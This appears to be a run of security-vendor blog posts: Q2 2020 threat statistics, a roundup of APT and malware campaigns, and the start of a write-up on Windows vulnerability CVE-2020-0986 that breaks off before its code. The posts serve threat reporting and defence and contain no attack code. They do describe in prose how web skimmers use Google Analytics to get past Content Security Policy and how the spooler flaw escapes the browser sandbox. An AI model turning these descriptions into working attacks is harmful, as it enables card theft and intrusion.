Attacks on Apple macOS

In Q2 2020, we discovered new versions of previously known threats and one new backdoor, which received the verdict of Backdoor.OSX.Lador.a. The malware is notable for being written in Go, a language gaining popularity as a means to create malware aimed at the macOS platform. If you compare the size of the Lador file with any backdoor created in Objective C, the difference will be very significant: the size of a Lador file is 5.5 megabytes, i.e. many times larger. And all this for the sake of remote access to the infected machine and execution of arbitrary code downloaded from the control center.

Top 20 threats for macOS

Verdict %* 1 Monitor.OSX.HistGrabber.b 17.39 2 Trojan-Downloader.OSX.Shlayer.a 12.07 3 AdWare.OSX.Pirrit.j 9.10 4 AdWare.OSX.Bnodlero.at 8.21 5 AdWare.OSX.Cimpli.k 7.32 6 AdWare.OSX.Pirrit.o 5.57 7 Trojan-Downloader.OSX.Agent.h 4.19 8 AdWare.OSX.Ketin.h 4.03 9 AdWare.OSX.Pirrit.x 4.00 10 AdWare.OSX.Spc.a 3.98 11 AdWare.OSX.Amc.c 3.97 12 Backdoor.OSX.Lador.a 3.91 13 AdWare.OSX.Pirrit.v 3.22 14 RiskTool.OSX.Spigot.a 2.89 15 AdWare.OSX.Bnodlero.t 2.87 16 AdWare.OSX.Cimpli.f 2.85 17 AdWare.OSX.Adload.g 2.60 18 AdWare.OSX.Pirrit.aa 2.54 19 AdWare.OSX.MacSearch.d 2.44 20 AdWare.OSX.Adload.h 2.35

* Unique users attacked by this malware as a percentage of all users of Kaspersky security solutions for macOS that were attacked.

The rankings of the most common threats for the macOS platform has not changed much compared to the previous quarter and is still largely made up of adware. As in Q1 2020, Shlayer (12.07%) was the most common Trojan. That malware loads adware from the Pirrit, Bnodlero and Cimpli families, which populate our TOP 20.

The Lador.a backdoor, which we mentioned above, entered the rankings along with adware.

Finally, in Q2 2020, a group of potentially unwanted programs collectively detected as HistGrabber.b joined the rankings. The main purpose of such software is to unpack archives, but HistGrabber.b also quietly uploaded the user’s browsing history to the developer’s servers. This is nothing new: all applications that steal browsing history have long been withdrawn from the App Store, and servers that could receive the data, disabled. Nevertheless, we deem it necessary to inform users of any such software discovered on their devices.

Threat geography

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Threat geography for the macOS platform, Q2 2020 (download)

TOP 10 countries

Country* %** 1 Spain 9.82% 2 France 7.73% 3 Mexico 6.70% 4 Italy 6.54% 5 India 6.47% 6 Canada 6.34% 7 Brazil 6.25% 8 USA 5.99% 9 United Kingdom 5.90% 10 Russia 5.77%

* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for MacOS (under 5,000).
** Unique users attacked in the country as a percentage of all users of Kaspersky security solutions for MacOS in the same country.

The most common threats in all the countries on the list without exception bundled various adware with the Shlayer Trojan.

IoT attacks IoT threat statistics

Q2 2020 saw no dramatic change in cybercriminal activity targeting IoT devices: attackers most frequently ran Telnet login and password brute-force campaigns.

Telnet 80.83% SSH 19.17%

Distribution of attacked services by number of unique IP addresses of attacking devices, Q2 2020

Further communication with IoT devices that pretended to be infected (and actually traps), was much more often conducted via Telnet.

Telnet 71.52% SSH 28.48%

Distribution of cybercriminals’ working sessions with Kaspersky traps, Q2 2020

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Geography of IP addresses of device from which attacks on Kaspersky Telnet traps originated, Q2 2020 (download)

TOP 10 countries by location of devices from which Telnet-based attacks were carried out on Kaspersky traps

Country %* China 12.75% Brazil 11.88% Egypt 8.32% Taiwan 6.58% Iran 5.17% India 4.84% Russia 4.76% Vietnam 3.59% Greece 3.22% USA 2.94%

* Share of devices from which attacks were carried out in the country out of the total number of devices

The three countries with the most devices that launched attacks on Kaspersky Telnet traps remained virtually unchanged. China (12.75%) was first, while Brazil (11.88%) and Egypt (8.32%) swapped positions.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Geography of IP addresses of device from which attacks on Kaspersky SSH traps originated, Q2 2020 (download)

TOP 10 countries by location of devices from which SSH-based attacks were carried out on Kaspersky traps

Country %* China 22.12% USA 10.91% Vietnam 8.20% Brazil 5.34% Germany 4.68% Russia 4.44% France 3.42% India 3.01% Egypt 2.77% Singapore 2.59%

* Share of devices from which attacks were carried out in the country out of the total number of devices

As with Telnet, the three countries where the most attacks on SSH traps originated remained unchanged from Q1 2020: China (22.12%), U.S. (10.91%) and Vietnam (8.20%).

Threats loaded into traps Verdict %* Trojan-Downloader.Linux.NyaDrop.b 32.78 Backdoor.Linux.Mirai.b 17.47 HEUR:Backdoor.Linux.Mirai.b 12.72 HEUR:Backdoor.Linux.Gafgyt.a 9.76 Backdoor.Linux.Mirai.ba 7.99 HEUR:Backdoor.Linux.Mirai.ba 4.49 Backdoor.Linux.Gafgyt.bj 2.23 HEUR:Trojan-Downloader.Shell.Agent.p 1.66 Backdoor.Linux.Mirai.cn 1.26 HEUR:Backdoor.Linux.Mirai.c 0.73

* Share of the malware type in the total amount of malware downloaded to IoT devices following a successful attack.

As in the first quarter, the NyaDrop Trojan led by the number of loads onto traps. The Mirai Trojan family retained its relevance in Q2 2020, occupying half of our IoT threat rankings.

Attacks via web resources

The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected.

Countries that are sources of web-based attacks: TOP 10

The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C2 centers, etc.). Any unique host could be the source of one or more web-based attacks.

To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.

In Q2 2020, Kaspersky solutions defeated 899,744,810 attacks launched from online resources located in 191 countries across the globe. A total of 286,229,445 unique URLs were recognized as malicious by Web Anti-Virus components.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of web-based attack sources by country, Q2 2020 (download)

Countries where users faced the greatest risk of online infection

To assess the risk of online infection faced by users in different countries, for each country we calculated the share of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.

This rating only includes attacks by malicious objects that fall under the Malware class; it does not include Web Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

Country* % of attacked users** 1 Algeria 11.2052 2 Mongolia 11.0337 3 Albania 9.8699 4 France 9.8668 5 Tunisia 9.6513 6 Bulgaria 9.5252 7 Libya 8.5995 8 Morocco 8.4784 9 Greece 8.3735 10 Vietnam 8.2298 11 Somalia 8.0938 12 Georgia 7.9888 13 Malaysia 7.9866 14 Latvia 7.8978 15 UAE 7.8675 16 Qatar 7.6820 17 Angola 7.5147 18 Réunion 7.4958 19 Laos 7.4757 20 Mozambique 7.4702

* Excluded are countries with relatively few Kaspersky users (under 10,000).
** Unique users targeted by Malware-class attacks as a share of all unique Kaspersky users in the country.

These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data.

On average, 5.73% of Internet user computers worldwide experienced at least one Malware-class attack.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Geography of malicious web-based attacks, Q2 2020 (download)

Local threats

In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users’ computers or removable media connected to computers (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs included in complex installers, encrypted files, etc.).

In Q2 2020, our File Anti-Virus detected 80,993,511 malware and potentially unwanted objects.

Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.

Note that the rating includes only Malware-class attacks; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

Country* % of attacked users** 1 Turkmenistan 48.0224 2 Uzbekistan 42.2632 3 Tajikistan 42.1279 4 Ethiopia 41.7213 5 Afghanistan 40.6278 6 Myanmar 39.1377 7 Burkina Faso 37.4560 8 Benin 37.4390 9 China 36.7346 10 Kyrgyzstan 36.0847 11 Vietnam 35.4327 12 Mauritania 34.2613 13 Laos 34.0350 14 Mongolia 33.6261 15 Burundi 33.4323 16 Belarus 33.0937 17 Guinea 33.0097 18 Mali 32.9902 19 Togo 32.6962 20 Cameroon 32.6347

* Excluded are countries with relatively few Kaspersky users (under 10,000).
** Unique users on whose computers Malware-class local threats were blocked, as a share of all unique users of Kaspersky products in the country.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Geography of local infection attempts, Q2 2020 (download)

Overall, 17.05% of user computers globally faced at least one Malware-class local threat during Q2 2020.

2020. szeptember 3.

IT threat evolution Q2 2020

IT threat evolution Q2 2020. PC statistics
IT threat evolution Q2 2020. Mobile statistics

Targeted attacks PhantomLance: hiding in plain sight

In April, we reported the results of our investigation into a mobile spyware campaign that we call ‘PhantomLance’. The campaign involved a backdoor Trojan that the attackers distributed via dozens of apps in Google Play and elsewhere.

Dr Web first reported the malware in July 2019, but we decided to investigate because the Trojan was more sophisticated than most malware for stealing money or displaying ads. The spyware is able to gather geo-location data, call logs and contacts; and can monitor SMS activity. The malware can also collect information about the device and the apps installed on it.

The earliest registered PhantomLance domain we found dates back to December 2015. We found dozens of related samples that had been appearing in the wild since 2016 and one of the latest samples was published in November last year. We informed Google about the malware, and Google removed it soon after. We observed around 300 attacks targeting specific Android devices, mainly in Southeast Asia.

During our investigation, we discovered various overlaps with reported OceanLotus APT campaigns, including code similarities with a previous Android campaign, as well as macOS backdoors, infrastructure overlaps with Windows backdoors and a few cross-platform characteristics.

Naikon’s Aria

The Naikon APT is a well-established threat actor in the APAC region. Kaspersky first reported and then fully described the group in 2015. Even when the group shut down much of its successful offensive activity, Naikon maintained several splinter campaigns.

Researchers at Check Point recently published their write-up on Naikon resources and activities related to “Aria-Body”, which we detected in 2017 and reported in 2018. To supplement their research findings, we published a summary of our June 2018 report, “Naikon’s New AR Backdoor Deployment to Southeast Asia“, which aligns with the Check Point report.

AR is a set of backdoors with compilation dates between January 2017 and February 2018. Much of this code operates in memory, injected by other loader components without touching disk, making it very difficult to detect. We trace portions of this codebase back to “xsFunction” EXE and DLL modules used in Naikon operations going back to 2012. It’s probably that the new backdoor, and related activity, is an extension of, or a merger with, the group’s “Paradir Operation”. In the past, the group targeted communications and sensitive information from executive and legislative offices, law enforcement, government administrative, military and intelligence organizations within Southeast Asia. In many cases we have seen that these systems also were targeted previously with PlugX and other malware.

The group has evolved since 2015, although it continues to focus on the same targets. We identified at least a half a dozen individual variants from 2017 and 2018.

You can read our report here.

COMpfun authors spoof visa application with HTTP status-based Trojan

Last October, we observed malware that we call Reductor, with strong code similarities to COMpfun, which infected files on the fly to compromise TLS traffic. The attackers behind Reductor have continued to develop their code. More recently, the Kaspersky Threat Attribution Engine revealed a new Trojan with strong code similarities to COMpfun.

The new malware, like its predecessor, targeted diplomatic bodies in Europe. To lure their victims, the attackers used spoofed visa applications that contain malware that acts as a first-stage dropper. This in turn downloads the main payload, which logs the target’s location, gathers host- and network-related data, performs keylogging and takes screenshots. The Trojan also monitors USB devices and can infect them in order to spread further, and receives commands from the C2 server in the form of HTTP status codes.

It’s not entirely clear which threat actor is behind COMpfun. However, based mostly on the victims targeted by the malware, we associate it, with medium-to-low confidence, with the Turla APT.

Mind the [air] gap

In June, we published our report on the latest tools and TTPs (Tactics Techniques and Procedures) of Cycldek (aka Goblin Panda, APT 27 and Conimes), a threat actor that has targeted governments in Southeast Asia since 2013.

Most of the attacks we have seen since 2018 start with phishing emails that contain politically themed, booby-trapped RTF documents that exploit known vulnerabilities. Once the target computer has been compromised, the attackers install malware called NewCore RAT. There are two variants. The first, BlueCore, appears to have been deployed against diplomatic and government targets in Vietnam; while the second, RedCore, was first deployed in Vietnam before being found in Laos.

Bot variants download additional tools, including a custom backdoor, a tool for stealing cookies and a tool that steals passwords from Chromium-based browser databases. The most striking of these tools is USBCulprit, which relies on USB media to exfiltrate data from victims’ computers. This may suggest that Cycldek is trying to reach air-gapped networks in compromised environments or relies on a physical presence for the same purpose. The malware is implanted as a side-loaded DLL of legitimate, signed applications.

Looking at big threats using code similarity

In June, we announced the release of KTAE (Kaspersky Threat Attribution Engine). KTAE was initially developed as an internal threat hunting tool by the Global Research and Analysis Team at Kaspersky and was instrumental in our investigations into the LightSpy, TajMahal, Dtrack, ShadowHammer and ShadowPad campaigns.

Here’s how it works in a nutshell. We extract from a suspicious file something that we call ‘genotypes’ – short fragments of code selected using our proprietary algorithm – and compare it with more than 60,000 objects of targeted attacks from our database, using a wide range of characteristics. Based on the code similarities, KTAE calculates a reputational score and highlights the possible origin and author, with a short description and links to both private and public resources, outlining the previous campaigns.

Subscribers to our APT intelligence reports can see a dedicated report on the TTPs used by the identified threat actor, as well as further response steps.

KTAE is designed to be deployed on a customer’s network, with updates provided via USB, to ensure confidentiality. In addition to the threat intelligence available ‘out of the box’, customers can create their own database and fill it with malware samples found by in-house analysts. In this way, KTAE will learn to attribute malware analogous to those in the customer’s database while keeping this information confidential. There’s also an API (application programming interface) to connect the engine to other systems, including a third-party SOC (security operations center).

Code similarity can only provide pointers; and attackers can set false flags that can trick even the most advanced threat hunting tools – the ‘attribution hell’ surrounding Olympic Destroyer provided an object lesson in how this can happen. The purpose of tools such as KTAE is to point experts in the right direction and to test likely scenarios.

You can find out more about the development of KTAE in this post by Costin Raiu, Director of the Global Research and Analysis Team and this product demonstration.

SixLittleMonkeys

Earlier this year, we observed a Trojan injected into the spooler system process memory of a computer belonging to a diplomatic body. The malware is implemented like an API using an enterprise-grade programming style – something that is quite rare and is mostly used by advanced threat actors. We attribute this campaign to a threat actor called SixLittleMonkeys (aka Microcin) because of the re-use of C2 infrastructure, code similarities and focus on diplomatic targets in Central Asia.

This threat actor uses steganography to deliver malicious modules and configuration data from a legitimate public resource, in this case from the legitimate public image hosting service cloudinary.com:

You can read our full report here.

Other malware Loncom packer: from backdoors to Cobalt Strike

In March, we reported the distribution of Mokes and Buerak malware under the guise of a security certificate update. Following publication of that report, we conducted a detailed analysis of the malware associated with this campaign. All of the malware uses legitimate NSIS software for packing and loading shellcode, and the Microsoft Crypto API for decrypting the final payload.

Besides Mokes and Buerak, which we mentioned in the previous article, we noticed packed specimens of DarkVNC and Sodin (aka REvil and Sodinokibi). The former is a backdoor used to control an infected machine via the VNC protocol; the latter is a ransomware family. However, the most striking find was the Cobalt Strike utility, which is used both by legal pen-testers and by various APT groups. The command center of the sample that contained Cobalt Strike had previously been seen distributing CactusTorch, a utility for running shellcode present in Cobalt Strike modules, and the same Cobalt Strike packed with a different packer.

xHelper: the Trojan matryoshka

The xHelper Trojan remains as active as ever. The most notable feature of this Trojan is its persistence on an Android device: once it gets onto a phone, it’s able to survive even if it’s deleted or the device is restored to factory settings.

The architecture of the latest version resembles a Russian nesting doll (or ‘matryoshka’). The infection starts by tricking a victim into downloading a fake app – in the case of the version we analyzed, an app that masquerades as a popular cleaner and speed-up utility. Following installation, it is listed as an installed app in the system settings, but otherwise disappears from the victim’s view – there’s no icon and it doesn’t show up in search results. The payload, which is decrypted in the background, fingerprints the victim’s phone and sends the data to a remote server. It then unpacks a dropper-within-a-dropper-within-a-dropper (hence the matryoshka analogy). The malicious files are stored sequentially in the app’s data folder, to which other programs do not have access. This mechanism allows the malware authors to obscure the trail and use malicious modules that are known to security solutions.

The final downloader in the sequence, called Leech, is responsible for installing the Triada Trojan, whose chief feature is a set of exploits for obtaining root privileges on the victim’s device. This allows the Trojan to install malicious files directly in the system partition. Normally this is mounted at system startup and is read-only. However, once the Trojan has obtained root access, it remounts the system partition in write mode and modifies the system such that the user is unable to remove the malicious files, even after a factory reset.

Simply deleting xHelper isn’t enough to clean the device. If you have ‘recovery’ mode set up on the device, you can try to extract the ‘libc.so’ file from the original firmware and replace the infected one with it, before removing all malware from the system partition. However, it’s simpler and more reliable to completely re-flash the phone. If the firmware of the device contains pre-installed malware capable of downloading and installing programs, even re-flashing will be pointless. In that case, it’s worth considering an alternative firmware for the device.

Spike in RDP brute-force attacks

The huge increase in remote working due to the COVID-19 pandemic has had a direct impact on cybersecurity and the threat landscape. Alongside the higher volume of corporate traffic, the use of third-party services for data exchange and employees working on home computers (, IT security teams also have to grapple with the increased use of remote access tools, including the Microsoft RDP (Remote Desktop Protocol).

RDP, used to connect remotely to someone else’s desktop, is used by telecommuters and IT support staff to troubleshoot problems. A successful RDP attack provides a cybercriminal with remote access to the target computer with the same permissions enjoyed by the person whose computer it is.

In the two months prior to our report (i.e. March and April), we observed a huge increase in attempts to brute-force passwords for RDP accounts. The numbers rose from 100,000 to 150,000 per day in January and February to nearly a million per day at the beginning of March.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Growth in the number of attacks by the Bruteforce.Generic.RDP family, February–April 2019 (download)

Since attacks on remote infrastructure will undoubtedly continue, it’s important for anyone using RDP to protect their systems. This includes the following.

  • Use strong passwords.
  • Make RDP available only through a corporate VPN.
  • Use NLA (Network Level Authentication).
  • Enable two-factor authentication.
  • If you don’t use RDP, disable it and close port 3389.
  • Use a reliable security solution.

Even if you use a different remote access protocol, you shouldn’t relax. At the end of last year, Kaspersky experts found 37 vulnerabilities in various clients that connected via the VNC protocol, which, like RDP, is used for remote access.

Gaming during the COVID-19 pandemic

Online gamers face various threats, including malware in pirated copies, mods and cheats, phishing and other scams when buying or exchanging in-game items and dangers associated with buying accounts.

The COVID-19 pandemic has led to a marked increase in player activity. For one thing, the sales of games have increased:

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Growth in game sales in the week of March 16-22. Source: gamesindustry.biz (download)

The amount of time spent playing has also increased:

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Growth in game sales in the week of March 16-22. Source: gamesindustry.biz (download)

This hasn’t gone unnoticed by cybercriminals. With the connection of work computers to home networks, and, conversely, the entry of home devices into work networks that are often poorly prepared for this, attacks on players are becoming not only a way to get to an individual user’s wallet but also a way to access the corporate infrastructure. Cybercriminals are actively hunting for vulnerabilities that they can exploit to compromise systems. For example, in the first five months of this year alone, the number of vulnerabilities discovered on Steam exceeded those discovered in any of the previous years.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Vulnerabilities discovered in Steam. Source: cve.mitre.org (download)

Of course, cybercriminals also exploit human vulnerabilities – hence the increase in phishing scams:

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

An increase in the number of hits on phishing Steam-related topics relative to February 2020. Source: KSN (download)

And the increase in detections on sites with names exploiting the theme of games:

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

The number of web attacks using game subjects during the period from January to May 2020. Source: KSN (download)

Data from KSN (Kaspersky Security Network) indicate that attackers focus most on Minecraft, followed by CS: GO and Witcher:

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

The number of attacks using the theme of an online game, January-May 2020. Source: KSN (download)

You can read more about this in our full report.

Rovnix bootkit back in business

In mid-April, our threat monitoring systems detected an attempt by cybercriminals to exploit the COVID-19 pandemic to distribute the Rovnix bootkit. The infected file, which has an EXE or RAR extension, is called (in Russian) ‘on the new initiative of the World Bank in connection with the coronavirus pandemic’. The file is a self-extracting archive that contains ‘easymule.exe’ and ‘1211.doc’.

The file includes the Rovnix bootkit.

Rovnix is well-known and the source code published some time ago. And there’s nothing new about cybercriminals exploiting the current pandemic to distribute malware. However, Rovnix has been updated with a UAC (User Account Control) bypass tool, allowing the malware to escalate its privileges without displaying a UAC request. It also uses DLL hijacking to camouflage itself in the system.

This version also delivers a loader that is unusual for this malware. Once the malware is installed, the C2 can send commands to control the infected computer, including recording sound from the microphone and sending the audio file to the cybercriminals, turning off or restarting the computer.

Our analysis of this version makes it clear that even well-known threats like Rovnix can throw up surprises when the source code goes public. Freed from the need to develop their own protection-bypassing tools from scratch, cybercriminals can pay more attention to the capabilities of their own malware and add their own ‘goodies’ to the source code – in this case, UAC bypass.

You can read our full analysis here.

Web skimming with Google Analytics

Web skimming is a common method of stealing the data of online shoppers. Cybercriminals inject malicious code into a target website to harvest the data entered by consumers. They gain access to the compromised site by brute-forcing an administrator account password, exploiting vulnerabilities in the CMS (content management system) or one of its third-party plugins, or by injecting malicious code into an incorrectly coded input form.

One way to prevent this is to try to block the exfiltration of the harvested data using a Content Security Policy (CSP) – a technical header that lists all services with the right to collect information on a particular site or page. If the service used by the cybercriminals is not listed in the header, they will not be able to withdraw any information they harvest.

Some attackers are using Google Analytics to work around this. Most online providers today carefully monitor visitor statistics; and the most convenient tool for doing this is Google Analytics. The service, which allows data collection based on many parameters, is currently used by around 29 million sites. So, there’s a strong likelihood that data transfer to Google Analytics is allowed in the CSP header of an online store. To collect website statistics, all you have to do is configure tracking parameters and add a tracking code to your pages. As far as the service is concerned, if you are able to add this code, you are the legitimate owner of the site. So, the malicious script injected by the attacker can collect user data and then, using their own tracking code, send it through the Google Analytics Measurement Protocol directly to their account.

To prevent these issues, webmasters should do the following:

  • Adopt a strict CMS access policy that restricts user rights to a minimum.
  • Install CMS components from trusted sources only.
  • Create strong passwords for all administrator accounts.
  • Apply updates to all software.
  • Filter user-entered data and query parameters, to prevent third-party code injection.
  • For e-commerce sites, use PCI DSS-compliant payment gateways.

Consumers should use a reliable security solution – one that detects malicious scripts on payment sites.

You can read more about this method here.

The Magnitude Exploit Kit

Exploit kits are not as widespread as they used to be. In the past, they sought to exploit vulnerabilities that had already been patched. However, newer and more secure web browsers with automatic updates simply prevent this. The decline in the use of Adobe Flash Player has also reduced the opportunities for cybercriminals. Adobe Flash Player is a browser plug-in: so even if the browser was up-to-date, there was a possibility that Adobe Flash was still vulnerable to known exploits. The end of life date for Adobe Flash is fast approaching. It is disabled by default in all web browsers and has pretty much been replaced with open standards such as HTML5, WebGL, and WebAssembly.

Nevertheless, exploit kits have not disappeared completely. They have adapted and switched to target people running Internet Explorer that haven’t installed the latest security updates.

Although Edge replaced Internet Explorer as the default web browser with the release of Windows 10, Internet Explorer is still installed for backward compatibility on machines running Windows 10; and has remained the default web browser for Windows 7, 8 and 8.1. The switch to Microsoft Edge development also meant that Internet Explorer would no longer be actively developed and would only receive vulnerability patches without general security improvements. Notwithstanding this, Internet Explorer remains a relatively popular web browser. According to NetMarketShare, as of April 2020, Internet Explorer is used on 5.45% of desktop computers (for comparison, Firefox accounts for 7.25%, Safari 3.94% and Edge 7.76%).

Despite the security of Internet Explorer being five years behind that of its modern counterparts, it supports a number of legacy script engines. CVE-2018-8174 is a vulnerability in a legacy VBScript engine that was originally discovered in the wild as an exploited zero-day. The majority of exploit kits quickly adopted it as their primary exploit. Since its discovery, a few more vulnerabilities for Internet Explorer have been discovered as in-the-wild zero-days – CVE-2018-8653, CVE-2019-1367, CVE-2019-1429 and CVE-2020-0674. All of them exploited another legacy component of Internet Explorer – a JScript engine. It felt like it was just a matter of time until exploit kits adopted these new exploits.

Exploit kits still play a role in today’s threat landscape and continue to evolve. We recently analyzed the evolution of one of the most sophisticated exploit kits out there – the Magnitude Exploit Kit – for a whole year. We discovered that this exploit kit continues to deliver ransomware to Asia Pacific (APAC) countries via malvertising. Study of the exploit kit’s activity over a period of 12 months showed that the Magnitude Exploit Kit is actively maintained and undergoes continuous development. In February this year, the exploit kit switched to an exploit for the most recent vulnerability in Internet Explorer – CVE-2019-1367 – originally discovered as an exploited zero-day in the wild. Magnitude Exploit Kit also uses a previously unknown elevation of privilege exploit for CVE-2018-8641, developed by a prolific exploit writer.

You can read more about our findings here.

While the total volume of attacks performed using exploit kits has decreased, it’s clear that they still exist, remain active, and continue to pose a threat. Magnitude is not the only active exploit kit and we see other exploit kits that are also switching to newer exploits for Internet Explorer. We recommend that people install security updates, migrate to a supported operating system (and make sure you stay up-to-date with Windows 10 builds) and also replace Internet Explorer as their web browser.

2020. szeptember 2.

Operation PowerFall: CVE-2020-0986 and variants

In August 2020, we published a blog post about Operation PowerFall. This targeted attack consisted of two zero-day exploits: a remote code execution exploit for Internet Explorer 11 and an elevation of privilege exploit targeting the latest builds of Windows 10. While we already described the exploit for Internet Explorer in the original blog post, we also promised to share more details about the elevation of privilege exploit in a follow-up post. Let’s take a look at vulnerability CVE-2020-0986, how it was exploited by attackers, how it was fixed and what additional mitigations were implemented to complicate exploitation of many other similar vulnerabilities.

CVE-2020-0986

CVE-2020-0986 is an arbitrary pointer dereference vulnerability in GDI Print/Print Spooler API. By using this vulnerability it is possible to manipulate the memory of the splwow64.exe process to achieve execution of arbitrary code in the process and escape the Internet Explorer 11 sandbox because splwow64.exe is running with medium integrity level. “Print driver host for applications,” as Microsoft describes splwow64.exe, is a relatively small binary that hosts 64-bit user-mode printer drivers and implements the Local Procedure Call (LPC) server that can be used by other processes to access printing functions. This allows the use of 64-bit printer drivers from 32-bit processes. Below I provide the code that can be used to spawn splwow64.exe and connect to splwow64.exe’s LPC server.

